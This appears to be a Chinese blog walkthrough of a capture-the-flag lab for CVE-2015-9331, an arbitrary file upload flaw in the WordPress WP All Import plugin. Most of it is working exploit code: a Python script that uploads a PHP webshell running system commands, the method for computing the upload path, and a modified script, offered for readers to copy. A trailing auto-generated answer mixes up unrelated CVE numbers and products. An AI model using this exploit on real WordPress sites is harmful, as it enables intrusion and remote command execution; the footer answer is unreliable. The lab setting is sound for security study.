【春秋云镜】CVE-2015-9331 必获取flag,来抄

靶场简介

wordpress插件 WordPress WP All Import plugin v3.2.3 存在任意文件上传,可以上传shell。

网上公开的POC

#/usr/local/bin/python3

 -*-coding:utf-8-*-
 
import requests,os
site="URL"
file_to_upload ='shell.php'
up_req = requests.post('http://'+site+'/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=evil.php',data=open(file_to_upload,'rb').read())
up_dir = os.popen('php -r "print md5(strtotime(\''+up_req.headers['date']+'\'));"').read()
print ("http://"+site+"/wp-content/uploads/wpallimport/uploads/"+up_dir+"/%s" % "evil.php")

shell.php内容:

<?php
system('cat /flag');phpinfo();
?>

其中

up_dir = os.popen('php -r "print md5(strtotime(\''+up_req.headers['date']+'\'));"').read()

这段代码是Python代码,其中使用了os.popen来执行一个命令行命令:
up_req.headers[‘date’]: 这是从up_req.headers字典中获取键为’date’的值。这很可能是HTTP请求的头部信息中的日期。
strtotime(‘’+up_req.headers[‘date’]+‘’): 这里使用了PHP的strtotime函数来将获取到的日期字符串转化为时间戳。
php -r “print md5(strtotime(‘’+up_req.headers[‘date’]+‘’));”: 这是一个PHP命令行指令,它会计算上述日期字符串的时间戳的MD5哈希值并打印出来。
os.popen(‘…’).read(): 使用Python的os.popen方法执行上述PHP命令,并读取其输出。

因为春秋云镜原因,为了让大家已学习为目的,修改了靶场上传
所以只允许以下文件上传
在这里插入图片描述

修改后的POC

上传webshel后,获取当前上传时间

import requests,os
import hashlib  
from datetime import datetime 
site="URL"
file_to_upload ='shell.zip'
up_req = requests.post('http://'+site+'/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=evil.php',data=open(file_to_upload,'rb').read())
print(up_req.headers['date'])


在这里插入图片描述
使用在线PHP执行工具,生成时间戳

Wed, 31 Jan 2024 07:14:49 GMT
在这里插入图片描述
得到+8时的北京时间时间戳和他的MD5值。

(因为大部分人过不去的原因,我猜可能是因为自己的系统没有PHP的函数,所以无法执行脚本)

http://eci-2ze96rpujhdxmjrfyixm.cloudeci1.ichunqiu.com/wp-content/uploads/wpallimport/uploads/替换这里/evil.php
在这里插入图片描述

抄吧脚本小子,反正我也不知道原理。
关注都关注了,就别取消了。

  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来修复这个漏洞,并提供了相关链接供参考。 另外,引用中还提供了一个链接,指向一个网址http://eci-2zej5zymcbcri9jmain3.cloudeci1.ichunqiu.com/,但无法确定这个链接与CVE-2022-0543之间的具体关系。 引用中还展示了一个尝试读取系统文件的HTTP请求,但同样无法确定这个请求与CVE-2022-0543之间的具体关系。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.csdn.net/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [[春秋云镜]CVE-2022-0543](https://blog.csdn.net/niubi707/article/details/128305838)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值